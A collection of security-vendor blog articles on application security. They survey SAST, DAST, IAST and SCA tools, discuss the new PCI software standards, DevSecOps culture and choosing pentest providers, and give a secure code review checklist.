Top SAST Tools for Developers

Finding coding errors early in the development life cycle can save organizations both time and money, as well as make applications more secure. Catching bugs early in development saves the time and money of catching them during post production and makes sure the code is written securely as it’s created. One way to catch code flaws sooner is through the use of Static Application Security Testing tools. 

SAST tools offer organizations a number of benefits. They scale well. They can be run on software written in a variety of languages. They can be run repeatedly, too, such as during overnight builds. They can be easily integrated into Integrated Development Environments. They can also identify common errors, such as buffer overflows, XSS problems and SQL injection flaws. What’s more, after they find an error, they can make life easier for developers by identifying source files, line numbers, and even subsections of lines containing errors. However, the tools have their weaknesses, too, which is why they should be used in conjunction with other error-finding solutions. SAST tools aren’t adept, for example, at finding authentication problems, access control issues, configuration flaws, and bad crypto. In addition, some of them produce too many false positives and have difficulty analyzing code that can’t be compiled. It can also be challenging to determine if a security issue is an actual vulnerability. There are a number of SAST tools—both commercial and open source —available to organizations. Here are five of the most popular in each category.

Commercial

Fortify Static Code Analyzer

This SAST tool made by Micro Focus can be harder than some other solutions to integrate into your software development lifecycle, although it does support IDE, build tools, code repositories, and bug tracking. Once it’s set up, though, both developers and security practitioners will like its performance. It produces understandable and traceable vulnerability information, supports 25 languages, and makes it easy to clean out false positives manually. What’s more, it can provide scan information fast, eliminating the need for partial or incremental scans. On the down side, some users have complained online about difficulty troubleshooting problems with Fortify’s support people and out-of-date documentation.

Veracode

In addition to SAST, Veracode’s solution supports Dynamic Application Security Testing and Software Composition Analysis, as well as manual penetration testing. Better yet, an application’s status across all testing can be seen through a single dashboard. The app is designed for developers, and includes an API for customizing the software. When it finds a vulnerability, it provides tips for fixing it. If you’re a Jira user, Veracode will open tickets with the appropriate development teams when it finds flaws in your code, which can also be helpful in generating valuable statistical information about your applications. According to Veracode, developers working in DevSecOps environments fix errors 11 times faster with its solution than other developers. 

Coverity Scan

Coverity SAST is part of the Synopsys Software Integrity Platform portfolio, which also includes technologies acquired from Cigital, Codiscope, and Black Duck Software. The portfolio covers the gamut of testing technologies—DAST, SCA, and Interactive Application Security Testing. Synopsys released an upgrade of Coverity earlier this year with enhanced capabilities that allow the software to scan for more vulnerability types across a variety of programming languages. It can also perform static code analysis without compiling code for languages that are interpretive in nature or where the code can be modeled fairly accurately without compilation. In addition, it can now do framework analysis and advanced JavaScript template analysis, which can spot XSS vulnerabilities in HTML dynamically generated by those templates.

Checkmarx CxSAST

CxSAST is part of Checkmarx’s Software Exposure Platform, which is designed to address software security risk throughout the software development lifecycle. It can identify hundreds of security vulnerabilities in both custom and open source components and supports more than 25 coding and scripting languages. However, some users have complained that better mobile language support is needed, especially support of Xamarin. Another user sore point is the cost of the software’s professional services. Most common plugins work well with the software and its integrations are solid, especially with build servers like Jenkins. It can also perform scans without building code.

AppScan

IBM recently sold AppScan to HCL. The software lets an organization implement a scalable security testing strategy that can pinpoint and remediate application vulnerabilities in every phase of the development lifecycle. It can test web, mobile, and open source software and provides management and reporting tools for multi-user, multi-app deployments. Deployment options are flexible and includes on-premise, cloud, and hybrid offerings. Users have praised the software for its low rate of false positives and its ability to counter application attacks, as well as protect data. It has been criticized for having an “unintuitive and hulking interface” and a support library that’s vast but difficult to navigate.

 

Open Source

Brakeman

This software is a free vulnerability scanner designed for Ruby on Rails applications. It statically analyzes Rails application code to find security issues at any stage of development. Users have praised the program for the speed and accuracy of its scans and for providing remediation information that’s easy for developers to understand.

NodeJsScan

Development teams working with Node.js can use NodeJsScan to scan their code. The software has a command line interface for easy integration with DevSecOps CI/CD pipelines. It produces results in JSON and supports a number programing languages, including Java, C++, C#, VB, PHP, and PL/SQL. A configuration file is available for each language which can be modified for customized searches. Overviews of files, as well as an entire codebase, can be visualized through stats and pie charts. The program can detect buffer overflows and flaws in Java code that may contain OWASP security risks.

Findbugs

This open source project sponsored by the University of Maryland is designed to catch bugs in Java code through static analysis. It has been awhile since the application was updated. The latest version is 3.0.1, released in March 2015. Scans classify the bugs and vulnerabilities they find into four rankings: scariest, scary, troubling, and of concern. The program can find defects in 15 categories, but reports can be customized so only a subset of the categories are reported on. Functionality can be expanded through plug-ins. Findbugs can be a powerful tool if configured correctly. It can also be run as part of a separate continuous automatic code review tool like Sputnik, which can give Findbugs’ reports better visibility.

JsHint

Engineers at Mozilla, Wikipedia, Facebook, Twitter, Yahoo, RedHat and other companies use JSHint to catch defects in JavaScript programs. The open source software is designed to help developers write complex programs without worrying about typos and language errors. It can scan a codebase and report on common mistakes and potential bugs, such as syntax errors, implicit type conversions. and leaking variables, as well as others. The tool was created in 2011 as a fork in the JSLint project by developers who felt JSLint was getting “too opinionated” and did not allow enough customization options.

CodeWarrior

 This web-based tool can find security vulnerabilities in applications written in C, C#, PHP, Java, Ruby, ASP, and JavaScript and is available for Linux, OX, BSD, and MacOS. The software doesn’t have to be installed on a machine. After downloading it, compiling it using “make” will get it running. In addition, although it’s a web app, Apache isn’t needed to run it. After starting CodeWarrior, it will open your web browser and ask you to choose what source code you want scanned. The program has a reputation for producing low rates of false positives.

Find and fix vulnerabilities
in your source code.

Open Source Security Tools to Complete Your Software Development Life Cycle

Integrating open source security tools into your SDLC

Change always has costs connected to it. Change needed when moving security “left” in your software development lifecycle is no exception. One way to curb costs when you leap into DevSecOps is to integrate open source security tools into the process.

Such tools are especially important as the software development process accelerates. That’s because the faster code is implemented, the more vulnerability issues it’s likely to have. Limiting vulnerabilities in deployed code should be the top goal of a DevSecOps program. Next in importance, is producing more secure software by teaching developers how to do that, providing processes and tools for application security standardization, and demonstrating software security maturity through metrics and assessment.

Even before you introduce open source tools into your pipeline, they can play a role in teaching your developers about writing secure software. For example, OWASP (Open Web Application Security Project) publishes a list of proactive controls to help developers do that. The concise list—explanations are two or three pages long—includes:

  • Define security requirements.
  • Leverage security frameworks and libraries.
  • Secure database access.
  • Encode and escape data.
  • Validate all inputs.
  • Implement digital identity.
  • Enforce access control.
  • Protect data everywhere.
  • Implement security logging and monitoring.
  • Handle all errors and exceptions.

OWASP also makes a vulnerability-riddled program called Juice Box that gives developers hands-on experience with an insecure application. Developers can test their knowledge of OWASP Top 10 vulnerabilities, as well as others, as they try to hack the app and rack up points.

Another free OWASP offering for developers are cheat sheets. They form a knowledge base of common security issues found in Web apps and how to mitigate them. For example, there’s a cheat sheet on password storage that explains typical errors made when storing passwords and how to use encryption and hashes to protect passwords from bad actors.

Threat modeling, which is performed during the design phase of a feature, can be used to address vulnerabilities before any code is written. OWASP makes an threat modeling open source tool called Threat Dragon that’s geared toward developers. It’s built around four essential questions. What are we building? What can go wrong? What are we going to do about that? Did we do a good enough job?

Tools in the pipeline

A number of open source tools are available to implement DevSecOps in your pipeline. Here are a few.

Static Application Security Testing (SAST)

SAST tools are used on code before you compile or run it. SAST tools analyze applications at the source code level. They can uncover errors in written code but not in code execution. In addition to finding security issues, they can find problems with documentation, bad coding standards, and performance. Automation is a key consideration when choosing a SAST because you want to continuously identify quality defects and security vulnerabilities as code is written so they can be addressed early in the SDLC.

Some open source SAST tools focus on particular coding languages. For example, reshift is a vulnerability scanner for Java and JavaScript. Brakeman is designed for Ruby on Rails and FlawFinder for C++.

Other SAST tools can scan a variety of languages. Google SearchDiggity, for instance, provides a source code security analysis of nearly every open source code project in existence. Graudit will scan multiple languages for security flaws, as well as SonarQube, which provides continuous inspection of code quality to perform automatic reviews of code for bugs, vulnerabilities, and code smells.

Dynamic Application Security Testing (DAST)

DAST tools monitor an application while it’s running. Typically, DAST tools test only exposed HTTP and HTML interfaces for web-enabled applications. The tools are easier to use than SAST tools, but they generate less information about what they find, leaving it up to the developer to find and fix vulnerable code.

DAST apps are available in both free and open source flavors for a number of platforms and as a service. Arachni, for example, is a free Ruby framework designed for penetration testers and administrators to assess the security of their web apps. It supports the big three desktop operating systems—Windows, MacOS and Linux—while tools like AppTrana and WebCookies perform their scans from the cloud.

OWASP sponsors an open source DAST project called ZAP—Zed Attack Proxy—for Windows, Unix/Linux, and MacOS supported by hundreds of volunteers. Not only can it automatically find security vulnerabilities in web applications as they’re being developed and tested, but it’s also useful for experienced pen testers performing manual tests.

Other open source DAST offerings for Windows, Unix/Linux, and MacOS include Grendel-Scan, which also has an automated testing module, and Wapiti, which does “black box” scans of the web pages on which the target apps reside and looks for scripts and forms into which it can inject data.

In addition to scanners for web apps, there are also open source DAST tools for securing web servers. Nikto, which supports Unix/Linux, performs tests for more than 6400 potentially dangerous files and Common Gateway Interface flaws, outdated versions of over 1,200 servers, and version-specific problems for more than 270 servers. Wikto will perform similar tests on Windows servers and has added features, such as a back-end miner and tight Google integration.

Interactive Application Security Testing (IAST)

IAST is a relatively new technology for finding security flaws in apps. Like DAST tools, IAST tools analyze running applications. Unlike DAST tools, IAST tools use code instrumentation to observe application behavior and data flow so they can provide developers with the information they need to pinpoint flaws and fix them. At this time, there’s only one free—with registration—IAST tool, Contrast Community Edition. The tool for Java code can be used on one application with up to five users.

Software Composition Analysis

Software Composition Analysis tools are used to analyze open source libraries and components used by an application. Vulnerabilities in open source components can evade other kinds of testing so it’s important to include an SCA tool in the DevSecOps pipeline. OWASP makes two SCA tools: Dependency Check and Dependency Track.

Dependency Check identifies dependencies in a project and checks if there are any known, publicly disclosed vulnerabilities in them. The tool fully supports Java and .NET and experimentally supports Ruby, Node.js, and Python. There’s also limited support for C/C++ build systems.

Dependency Track keeps tabs on all third-party components in all applications created or consumed by an organization. It’s integrated with an assortment of vulnerability databases, including the National Vulnerability Database (NVD), NPM Public Advisories, Sonatype OSS Index, and VulnDB from Risk Based Security.

When incorporating open source security tools into your DevSecOps pipeline, you’ll want to automate as many of the security tests as possible. The tests should be automated at every major commit of code by development or operations, even at the very early stages of a project. The idea is to create short feedback loops so the DevOps teams are notified of potential security problems within short time frames. That way, the teams can mitigate the problems as part of their daily workflow and when they’re digestible—not at the at the end of the software development lifecycle when fixes can become complex, time-consuming, and expensive.

New PCI Framework Boosts DevSecOps

New PCI DSS Security Standards Boosts DevSecOps

Earlier this year, the PCI Security Standards Council released the first major revamp of its software standards in over a decade.

The new standards were crafted to better evaluate the security of payment ecosystems.  They’re meant to square existing standards with modern software production, which embraces DevOps, Agile, and continuous integration and delivery.

They may also fire interest in embedding security earlier into the software development life-cycle.

With the new standards, the PCI council hopes to reduce credit card fraud, which continues to plague the industry despite the move to EMV technology. The chip-on-a-card tech was supposed to thwart fraudsters.

"60 million U.S. payment cards were compromised during the previous 12 months. Of that number, 75 percent (45.8 million) were compromised at a point-of-sale device, with the remainder compromised in an online breach"

That doesn’t seem to be the case, however. A report by Gemini Advisory released in May noted that 60 million U.S. payment cards were compromised during the previous 12 months. Of that number, 75 percent (45.8 million) were compromised at a point-of-sale device, with the remainder compromised in an online breach.

Surprisingly, of the card-present cards compromised, 90 percent had EMV chips.

Secure Software Standard 2019

The new standards—the Secure Software Standard and Secure Software Lifecycle Standard—are part of the PCI Software Security Framework. The framework is a collection of software security standards and associated validation and listing programs for the secure design, development, and maintenance of modern payment software.

“Software development practices have evolved over time, and the new standards address these changes with an alternative approach for assessing software security,” PCI SSC Chief Technology Officer Troy Leach explained in a blog.

“The PCI Software Security Framework introduces objective-focused security practices that can support both existing ways to demonstrate good application security and a variety of newer payment platforms and development practices,” he added.

PCI has designed the Secure Software Standard to protect the integrity and confidentiality of payment transaction and data through new security requirements and assessment procedures. The S3 addresses issues such as critical asset identification, secure default configuration, sensitive data protection, authentication and access control, attack detection, and vendor security guidance.

Replacing PA-DSS

The S3 is expected to eventually replace the existing Payment Application Data Security Standard. The PA-DSS focuses on software development and lifecycle management principles for security in traditional payment software to help merchants maintain PCI-DSS compliance. The S3 goes beyond that. It addresses overall software security resiliency.

“The PA-DSS is applicable to direct payment applications only—apps that directly process credit cards. The new standards apply to all application development in the PCI DSS space,” Matthew Getzelman, a principal consultant at Synopsys, explained in a company blog.

Both standards are similar in one respect, however. Their goal is to establish a way to demonstrate how software protects the payment data that it stores, processes, or transmits and give software providers a method for performing independent security evaluations of their software.

A gradual transition from PA-DSS to S3 is envisioned by the PCI council. Organizations that have invested in PA-DSS can continue to use applications validated under that process until 2022, when validation on those apps runs out. After that, those applications will be moved to a “acceptable for pre-existing deployments list” and any upgrades of those apps will have to  assessed under the new Software Security Framework.

Both standards are similar in one respect, however. S3 is aimed at payment software that is sold, distributed or licensed to third parties for supporting or facilitating payment transactions. However, the council is encouraging large organizations to use the standards on their in-house payment apps, too.

Secure Life-Cycle Management 2019

The new PCI framework also includes Secure Lifecycle Management standards. Those standards could help expand the movement toward embedding security earlier into the application development life-cycle.

“I was particularly pleased to see the emphasis on integrating security into the software development process rather than attempting to assure security by after-the-fact testing,” Steve Lipner, executive director of the Software Assurance Forum for Excellence in Code and a participatant in the PCI Software Security Task Force, said in a statement.

Modern software development, which incorporates Agile, DevOps, and continuous integration and delivery, has increased the difficulty of maintaining good application security as changes are introduced. The new life-cycle standards address that challenge by outlining security requirements and assessment procedures by which software vendors can validate their security efforts throughout the application life-cycle.

Among the principles addressed by the standards are governance, threat identification, vulnerability detection and mitigation, security testing, change management, secure software updates, and stakeholder communications.

The standards can be used by makers of software for the payments industry to demonstrate they have mature secure application life-cycle management practices in place to ensure their apps are designed and developed to protect payment transactions and data, minimize vulnerabilities, and defend against attacks.  

“This provides confidence to businesses using the payment application that their software vendor is providing ongoing assurance to the integrity of the software development and confidentiality of payment data as change occurs,” PCI’s Leach explained.

Flexible Testing

More integration of security into the software lifecycle will also be encouraged by more flexible testing standards than in the past. PA-DSS, for example, is overly prescriptive.

“It said you had to do A, B, and C, and it just didn’t work for a lot of different kinds of software,” Jeff Williams, co-founder and CTO of Contrast Security and a participant in the expert council that contributed to the new standard, told Dark Reading.

“So when you’re looking at DevOps projects that are releasing seven times a day and moving super fast and using tons of libraries, and building APIs, and deploying in the cloud, that old standard just didn’t work well,” he added.

Testing is no longer limited to pen and software application security testing. To meet the new standards, a combination of static and dynamic tools must be used to validate each code objective. They include automated static analysis security testing (SAST), dynamic analysis security testing (DAST), interactive application security testing (IAST), and software composition analysis (SCA) tools—as well as manual techniques such as manual code reviews and penetration testing.

The new PCI Security Framework has been described as “transformational” by some experts. But Sammy Migues, chief scientist at Synopsys, who served on a working group that developed the standards, had a word of warning for enthusiasts of the new rules. The “intent and philosophy” are transformational, he told Forbes, but it will take some time to see if the reality matches the intent.

Prove to your clients you are compliant to secure software standards.

Was this article helpful?

Prove to your clients you are compliant to secure software standards.

Watch Out for Hidden Costs of Security Tools for Developers

hidden costs for developers

Hidden Costs of Security Tools for Developers

As security “shifts left” in the application development lifecycle, developers will be called on to work with tools to reduce flaws in their code that could make their programs vulnerable to attack by threat actors. Those tools, though, can come with costs that aren’t immediately apparent.

For example, detection-based tools can distract developers from their primary tasks and lead to costly losses in productivity and increases in overhead expenses.

On the balance sheet, these tools can appear as advanced threat detection applications, detonation environments, antivirus programs and white and blacklisting. And for a 2,000 person organization, those tools could cost an average of $345,000 a year, according to a recent study conducted by Vanson Bourne for Bromium.

But the costs don’t stop there. There are human capital costs.

For a 2,000 person organization, security tools can cost up to: 

$350,000

Human Capital Costs

Depending on how fine an organization sets the sensitivity of such tools, they can create an avalanche of alerts—as many as a million a year—for a security team or developers to triage. What’s worse, most of those alerts—75 percent by some estimates—are false positives.

Those hours chasing alerts, triaging threats, rebuilding compromised machines, and issuing emergency patches, can cost an organization more than $16 million a year.

Static Code Analysis Tools

Static code analysis tools can also contain hidden costs.

Static code analysis tools that identify security flaws can perform automated scans during the development life-cycle. However, some of these tools can slow down the process and add time to when an application is delivered.

It’s also important to be aware of the limitations of SAST tools. A study by the National Institute of Standards and Technology’s SOMATE Project found that static tools were able to find “simple” bugs in code but failed to find vulnerabilities that require a deep understanding of code or design.

For example, when a SAST tool was used to scan the popular open source software Tomcat, warnings were generated for only four of 26 Common Vulnerability & Exposure entries. In other words, if an organization produced an application like Tomcat and it depended on a SAST tool as its primary application security application, its software would be delivered with 22 of 26 vulnerabilities intact.

4/26

Common vulnerability & exposure entries were generated when a SAST tool scanned the open source software Tomcat.

Static tools can also be challenged by dynamically typed languages, like JavaScript and Python. Inspecting objects in those tongues at compile time won’t reveal their class/type. That hinders the tool’s ability to find certain security flaws in the code.  According to noted software security author Gary McGraw, code flaws that SAST doesn’t handle reliably include:

  • Storage and transmission of confidential data, especially when the data isn’t programmatically discernable from non-confidential data;
  • Authentication, such as susceptibility to brute force attack or effectiveness of a password reset;
  • Entropy for randomization of non-standard data
  • Privilege escalation and insufficient authorization; and
  • Data privacy, such as data retention and masking credit card numbers when they’re displayed.

There are several gaps that SAST tools often burden users with. We have built an automated tool called reshift that works to mitigate these hidden costs of SAST tools on the market today.

Open Source Problems

If an organization’s security tools are friendly to DevOps, most security tasks will be performed automatically in the same pipeline as the one used for producing the app. Only security issues that require human intervention will be flagged for developer action.

Instead of security erecting gates that code has to pass through before entering production, Laine explained, it needs to erect guardrails that allow developers to make mistakes but prevent them from creating disasters,

Tools and agility alone, though, don’t make DevOps and DevSecOps work, Laine noted. “It’s those things, plus a culture of respect and culture of collaboration,” he said.

Open source tools have steadily gained popularity among security practitioners for a number of reasons. They can be customized to fit an organization’s needs. They offer a way to avoid software licensing or subscription headaches, as well as vendor lock-in. And because they’re distributed without charge, they sometimes can save a business money.

There are also hidden costs connected to these tools.

Learning Curve:

Open source software doesn’t always have intuitive interfaces so it can be difficult to learn. That means training may be necessary and reduced productivity can be expected as users advance up the learning curve.

That’s especially true when developers are asked to perform security tasks earlier in the application development lifecycle. Many developers have limited experience writing secure code. In addition, creating consistent, repeatable processes that enable developers with a variety of skill sets to find and fix security flaws can be challenging.

If the interface for the tool has to be redesigned, that’s another expense that has to be taken into account.

Installation:

The tools can also be challenging to install. If an organization has a strong IT department, that might not be a problem. If it doesn’t, outside help may be necessary. That kind of help can be expensive.

Even with a strong IT presence, open source tools can require large time commitments from an enterprise.

Customization:

The same is true for customization. If an organization has the IT chops to fiddle with an application, an open source tool may be able to meet its needs. If not, it may find itself buying add-ons to get a job done or worse, upgrading to a “premium” version of the tool, which comes with much of the baggage—and expense—of a commercial solution.

Support:

Support, too, can be a problem. Unlike commercial software, help isn’t a phone call away. If something doesn’t work or breaks and a shop doesn’t have an IT department or in-house tech guru, more expenses will be incurred.

Granted, the idea behind open source software is its community provides the support that in the commercial world is found on a help line. Not all open source projects have large communities, though. Even for those that do, finding information can be challenging. It may require combing through thousands of postings written in forums over years.

What’s more, the quality of the postings can vary. They are written by people with a variety of experience and knowledge of a tool. Some may even know less about an application than the person seeking information about it.

Remember, too, that the costs of an open source solution are ongoing. Resources have to be continually dedicated to updates, patches, maintenance and training existing and new users. Failure to do so can have disastrous consequences, as Equifax found out when it failed to keep its Apache Struts web framework up to date.

As organizations try to get greater developer participation in securing their applications, they’ll need to provide those developers with tools that are intuitive to use or better yet, integrated into the life-cycle process itself where a minimum of human intervention is necessary. That way many of the hidden costs associated with existing tools can be avoided.

Was this article helpful?

3 Things to Watch Out For While Integrating Security into DevOps

devsecops

Security should not be an afterthought to DevOps

DevOps has revolutionized how new applications are brought online, but it is also challenging how security teams do their jobs. 

In theory, DevOps can make applications more secure by baking security into the Software Development Lifecycle from the earliest stages of that cycle. Right now, though, that’s not the case.

"While automation and team integration could lead to greater adoption of application security in the future, the current state is that most organizations are not implementing security within their DevOps programs"

-Report by Hewlett Packard Enterprise on application security and DevOps Tweet

“In mature security organizations, where application security is already an integral part of development, it continues to be prioritized as a critical DevOps component,” the report continued. “If a secure SDLC was not a disciplined practice before, it is often left behind in the rush to DevOps.”

Adjusting to Speed

One aspect of DevOps security teams must adjust to is speed. Eighteen month development cycles are being reduced to six weeks or less. That severely impacts the time the team has to do due diligence. Read more on integrating security in the SDLC.

Moreover, coding is being done by mulitple teams. DevOps teams tend to be smaller and there are more of them so not only is code being produced more rapidly, but more infrastructure is changing more rapidly, too,  through automation and agile tools. “This breaks the traditional security approach in a pretty profound way,” Sami Laine, principal technologist at CloudPassage, said at a recent webinar.

It also requires that security tools be automated and orchestrated to match the speed at which the developers are working. Without a fully automated tool chain, security can bog down the DevOps process by hours or days. “This is fundamentally breaking the spirit and flow of the way DevOps should work,” Laine noted.

This lead us to build a security devops tool that ultimately integrates into the developer pipeline and operates at the speed of devops. 

If an organization’s security tools are friendly to DevOps, most security tasks will be performed automatically in the same pipeline as the one used for producing the app. Only security issues that require human intervention will be flagged for developer action.

Instead of security erecting gates that code has to pass through before entering production, Laine explained, it needs to erect guardrails that allow developers to make mistakes but prevent them from creating disasters,

Tools and agility alone, though, don’t make DevOps and DevSecOps work, Laine noted. “It’s those things, plus a culture of respect and culture of collaboration,” he said.

Security's Changing Role

Tension between security teams and developers have always been a problem due to conflicting goals. Developers want their software out of the pipeline as fast as possible. Security teams stand in the way of that with their testing and demands that developers go back to the drawing board to fix flaws.  Read more on integrating security with agile.

There’s no room for that kind of tension in a DevOps environment. To reduce it, security teams need to alter their roles in the process.

Adrian Sanabria, a senior analyst with The 451 Group and who also participated in the webinar, sees security becoming a consulting organization within the enterprise. That shift will benefit security because it means security will be working more closely with developers. “We’re going to understand the constraints that they have,” Sanabria said. “We’re going to throw less things over the wall that shouldn’t be fixed or can’t be fixed easily because we understand the environment better.”

With the proper security automation tools in place, human intervention into DevOps can be kept to a minimum. “If there are any problems, they’re sent back to the developer,” Sanabria explained. “Security doesn’t even need to be involved in that transaction.”

Security involvement may be necessary if the developer has a question about the problem. Then security, wearing its consultant’s hat, can explain the severity of the problem, such as if you don’t fix it, the app will  be compromised within 10 seconds of going live.

Prove You're Adhering to Security Best Practices with Our Latest Whitepaper



New Skills

Security pros will also need new skills to better secure apps in a DevOps environment. Those include the ability to write code and scripts, as well as working with APIs. Those skills will be necessary for automating traditional security tasks and “baking” them into the development process. “No longer is it a question of baked-in versus bolted in,” Sanabria said. “It’s just a question of how are you going to bake it in?”

Traditional security practitioners will remain relevant, he noted, although demand for infosec pros who have new skills is growing rapidly. He noted that in an informal survey of job listings he conducted, about 60 percent of them were looking for candidates with new skills.

DevOps is causing a change in security culture, Sanabria maintained. “In a lot of environments, people have described it to me as pulling off a Band-Aid,” he said. “Some people were able to make the shift, other people they had to either find different things for them to do or lay them off.”

“Talent acquisition becomes a really tough problem in this new environment,” he observed.

“In fact,” he added, “in some organizations, I’m seeing companies hiring developers and teaching them security because they find that easier than to take traditional security people with experience and to try to pull them over into this new world of new IT.”

Change our mind

change-my-mind

The keys to application security lie within DevOps.

Do you agree? Drop us a comment and let us know what you think. 

Was this article helpful?

3 Considerations Before Deciding to Switch Pentest Providers

The History of Pentest Providers

You have done one or more pentests whether for PCI compliance purposes, for internal policy requirements, or perhaps your clients require it. Now it is time to perform another one, and the question that always seems to arise, should you change your pen-tester provider? One opinion out there is to change vendors every 2–3 years, as it is believed a new vendor would come with a fresh perspective, and hence new bugs.

This advice seems to date back to the 2000’s where application security was pretty new and penetration testing providers wouldn’t have any trouble identifying a fair number of issues per test. At that time, security controls were pretty much non-existent, perimeter security ruled as a the method of choice for protecting everything from the network down, to applications, and everything in between. One of the other sources of this advice is a SANS whitepaper from 2010 that outlined changing vendors as good practice.

Applications have changed quite a bit since the 2000’s, they are more complex, have modern languages, a native framework protection, and a multitude of other factors suggests that this advice might be obsolete. While there are legitimate reasons for changing your application security vendor, there are a few things that should be kept in mind:

penetration testing

Here are the top reasons for alternating your vendors:

1. Complacency

Application security engineers just like developers can be blind to some aspect of their work. For software developers, it can be very hard to find their own bugs, hence the practice of peer code review and the slew of quality assurance controls that are put in place such as unit tests, manual and automated quality assurance tests.

Application security engineers can face the same problem where they would be blind to any other bugs in the application that they didn’t find.

One of the questions you need to ask your pentest vendor is what do they do to overcome this problem.

2. Quality and Value Intelligence

It might be worth to consider other vendors to understand what service you are getting at what price point. Additionally, not all penetration testing providers are created equal, so one vendor could be really good at identifying vulnerabilities but post-report support might not be great, while another vendor really excels at the services provided post-report.

3. Leveraging Different Expertise

It might be worth exploring different vendors for different expertise areas. For example one vendor could be very strong in performing a pentest, but not as much in social engineering. So leveraging different vendors for different areas of strengths.

Here are the top considerations before  deciding to switch vendors:

1 .  Losing Context and Application Knowledge: There is most likely 3 levels of depth to any pentest:

Level 1: The low hanging fruit: which is basically what any scanner can find.

Level 2: The medium range issues: bugs that scanners can’t find but an engineer can, they are still easy to find, it just needs someone looking for them, agile enough with their approach.

Level 3: The Difficult Bug: these are only found when the engineer gets intimate enough with the application to understand exactly how it works.

For a 2–3 week long penetration test, it is very hard for a new vendor to reach Level 3 in such a short amount of time. Depending on the nature of your application, there might not be a lot of business logic to the application and hence there is no need for Level 3. Another thing to consider is who are your primary threat actors? Are you up mostly against script kiddies or professional hackers and cyber gangs?

2 .  Loosing the Partner Relationship:

It takes time for a pentest service to understand your business, application, and the dynamics of your team. Working with a pentest provider should not stop at the delivery of the report. A good pentest provider should be able to identify really good bugs, and more importantly help you mitigate those bugs and further fortify the application. If you are not getting that help from your current vendor, it might be worth it to have a conversation with that vendor or search for a new one.

3 .  Losing Motivation:

For most companies in the professional services space, it is (or at least it should be) their top priority to go the extra mile to keep their clients. Knowing from the get go that it is temporary relationship might not motivate that vendor to go above and beyond for you. Don’t get me wrong, I don’t mean the vendor will offer degraded or less than normal service. It means not going the extra mile for a client who is guaranteed not to come back.

There are several factors that go into choosing a pentest partner: skills, history, price, and processes among others. Building a solid relationship with them and getting the most value requires communication, trust and transparency.

What do you believe is best practice?

Was this article helpful?

Secure Code Review Checklist [Downloadable]

Secure Code Review

The team at Software Secured takes pride in their secure code review abilities. We perform secure code review activities internally on our applications, as well as, on client secure code review and hybrid assessments. We do a lot more of the latter, especially hybrid assessments, which consist of network and web application testing plus secure code review.

From the perspective of our team of penetration testers, secure code review is a vital ally in reporting security findings, it allows us to understand the inner workings of applications, by permitting us to correlate our dynamic testing findings with our static testing findings as well as increasing the automated test coverage we can apply. This is a powerful combination containing both SAST and DAST techniques, each with their individual pros and cons. We employ the two techniques in combination as it is more powerful than each technique performed individually, which allows our team to deliver high quality reports to our clients.

[Want to learn the basics before you read on? Check out simplified secure code review.]

While searching through countless published code review guides and checklists, we found a gap that lacked a focus on quality security testing. With that, we built the following list as a compilation of OWASP code review, strong components of other lists, and added a few of our own.

Below you’ll find the procedure to follow when beginning a secure code review along with the accompanying checklist, which can be downloaded for your use

Secure Code Review Checklist

1.  Download the version of the code to be tested.

2. Look at the file / folder structure.

  • We are looking for how the code is layed out, to better understand where to find sensitive files.
  • Confirm there is nothing missing

3.  Open the code in an IDE or text editor. The tool should have the following capabilities:

  • Open many files quickly.
  • Multiple search tabs to refer to old search results.
  • Regular expressions.

This allows us to perform searches against the code in a standard way.

4. Search through the code for the following information:

  • Configure Files
  • These can be used for authentication, authorization, file upload, database access etc. Does the application use Ruby on Rails, or Java Spring.
  • Application Routes
  • How does user input map to the application.
  • Sensitive Keywords
  • Password, token, select, update, encode, decode, sanitize, filter.

5. Scan the code with an assortment of static analysis tools. (for example on Java applications we would use SpotBugs with the findsecbugs plugin). I’ve included a list below that describes scanners we use:

  • Java - SpotBugs + FindSecBugs
  • Ruby - Brakeman
  • Python - Bandit
  • .Net - Roslynn Security Guard
  • JavaScript - EsLint with Security Rules and Retire.js
  • Third Party Dependencies - DependencyCheck

Here is a valuable list of SAST tools that we reference when we require different scanners.

6. Check every result from the scanners that are run against the target code base. Valid security issues are logged into a reporting tool, and invalid issues are crossed off. For each result that the scanner returns we look for the following three key pieces of information:

  • Source
  • Sink
  • Any transformations that occur on the data that flows from source to sink.

The tester will always be able to identify whether a security finding from the scanner is valid by following this format. Once the three pieces of information are known, it becomes straightforward to discern if the issue is valid.

While checking each result, audit the file of other types of issues. Often scanners will incorrectly flag the category of some code. This can also help the tester better understand the application they are testing.

For each issue, question your assumptions as a tester. The code plus the docs are the truth and can be easily searched.

7. Once we find a valid issue, we perform search queries on the code for more issues of the same type. This is done by running regex searches against the code, and usually uncovers copy and pasting of code.crossed off. For each result that the scanner returns we look for the following three key pieces of information:

8. Search for documentation on anything the tester doesn’t understand. This helps the tester gain insight into whether the framework/library is being used properly.

A key activity the tester will perform is to take notes of anything they would like to follow up on. Performing a security review is time sensitive and requires the tester to not waste time searching for issues which aren’t there. This is solved by taking notes of issues to come back to while reviewing the scanner results, so as to not get stuck on anything. This is done for the entirety of the review and as a way to keep a log of what has been done and checked.

The security code review checklist in combination with the secure code review process described above, culminates in how we at Software Secured approach the subject of secure code review. This approach has delivered many quality issues into the hands of our clients, which has helped them assess their risk and apply appropriate mitigation. By following a strict regimented approach, we maintain and increase the quality of our product, which is delivered to happy clients.

Below is the downloadable checklist which can be used to audit an application for common web vulnerabilities.

Resources

DAST Tools: What They Are Good At Finding

Your application is secure? Prove it!

In a galaxy far, far away there is a dark magic button to find all security vulnerabilities in all applications created or ever be created.  No specific knowledge is required, just press the button and get results.

It sounds a bit unrealistic but that’s how Dynamic Analysis Security Testing (DAST) tools work, or at least from user’s perspective. DAST utilizes Black Box testing methodology when it is not required to have any knowledge about the application’s code, structure, or internal architecture. You must find the inputs and define what is normal a normal output and what is an exception, then tests each of them. DAST requires a running instance of the application where it determines completeness of the scan by a path coverage metric. If all possible inputs were tested, then path coverage is 100%.

To provide good coverage the DAST tool needs to “learn” an application by visiting web pages and extracting URLs for other pages.

To provide good coverage the DAST tool needs to “learn” an application by visiting web pages and extracting URLs for other pages. It can be a fully automated process where the DAST tool scans and tries to find all inputs, or it can be done with the assistance of people and other resources. DAST tools can act as a proxy, listening to traffic and “learning” the application. Manual (a user visits the website) or automated (recorded user’s actions are re-played with web driver) browsing can be used to generate starting points for DAST tools.

While DAST is essential for application security testing it cannot provide a complete overview of all vulnerabilities.​

